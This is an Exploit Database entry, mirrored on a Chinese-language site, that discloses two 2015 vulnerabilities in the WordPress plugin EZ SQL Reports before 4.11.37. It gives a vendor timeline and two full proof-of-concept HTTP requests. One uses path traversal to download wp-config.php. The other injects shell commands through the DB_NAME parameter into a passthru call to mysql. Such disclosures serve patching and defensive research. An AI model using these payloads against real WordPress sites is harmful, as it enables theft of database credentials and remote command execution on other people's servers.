WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities

• Exploit Database
• 116 阅读

• 作者： Felipe Molina
  日期： 2015-09-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38176/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81

  # Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary File Download (admin/colaborator required) # Google Dork: - # Date: 12/09/2015 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://wordpress.org/plugins/elisqlreports/ # Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip # Version: < 4.11.33, fixed in 4.11.37 # Tested on: Debian GNU/Linux 7 with WordPress 4.3 # CVE : N/A # # Summary: The plugin allows a wordpress site administrator or collaborator to download arbitrary files from the host file system though the plugin functionality of downloading .sql, .sql.zip or .sql.gz files created by the wordpress administrator. # The file name to download is not sanitized and path traversal can be injected in the request. # # Timeline: # - 09/09/2015: Fist contact with the author # - 11/09/2015: Author creates fix and communicate to me # - 12/09/2015: Public release of the new plugin version   # POC: To retrieve the wp-config.php file:   GET /wp-admin/admin.php?page=ELISQLREPORTS-settings&Download_SQL_Backup=../../../wp-config.php HTTP/1.1 Host: <the host with the wordpress> Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: <User-Agent> Referer: http://<the host with the wordpress>/wp-admin/admin.php?page=ELISQLREPORTS-settings Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_[...etc...]4af418c3efd     # Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary Code Execution (admin/colaborator required) # Google Dork: - # Date: 12/09/2015 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://wordpress.org/plugins/elisqlreports/ # Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip # Version: < 4.11.33, fixed in 4.11.37 # Tested on: Debian GNU/Linux 7 with WordPress 4.3 # CVE : N/A # # Summary: There are several calls to "passtthru" in the code, one of them is receiving the username, password, database name and host from the $_POST arguments, so you can inject in every of this parameter the ";" character or others like "&&" or "||" to execute other distinct commands to "/usr/bin/mysql" # # Timeline: # - 09/09/2015: Fist contact with the author # - 11/09/2015: Author creates fix and communicate to me # - 12/09/2015: Public release of the new plugin version   # POC: Send a POST request like this to obtain in the folder wp-admin a file with name "testrce.txt". The parameters DB_NAME, DB_HOST, DB_USER, and DB_PASSWORD are injectable:   POST /wp-admin/admin.php?page=ELISQLREPORTS-settings HTTP/1.1 Host: <wordpress web> Proxy-Connection: keep-alive Content-Length: 177 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://<wordpress web> Upgrade-Insecure-Requests: 1 User-Agent: <the user agent> Content-Type: application/x-www-form-urlencoded Referer: http://<wordpress web>/wp-admin/admin.php?page=ELISQLREPORTS-settings Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_8fa[...etc...]b7d   DB_NAME=<the db name>%3B+touch+testrce.txt%3B+&DB_HOST=127.0.0.1&DB_USER=<theuser>&DB_PASSWORD=<thepassword>&db_date=z.2015-08-27-20-22-29.manual.wp.127.0.0.1.sql.zip&db_nonce=au78c5ff86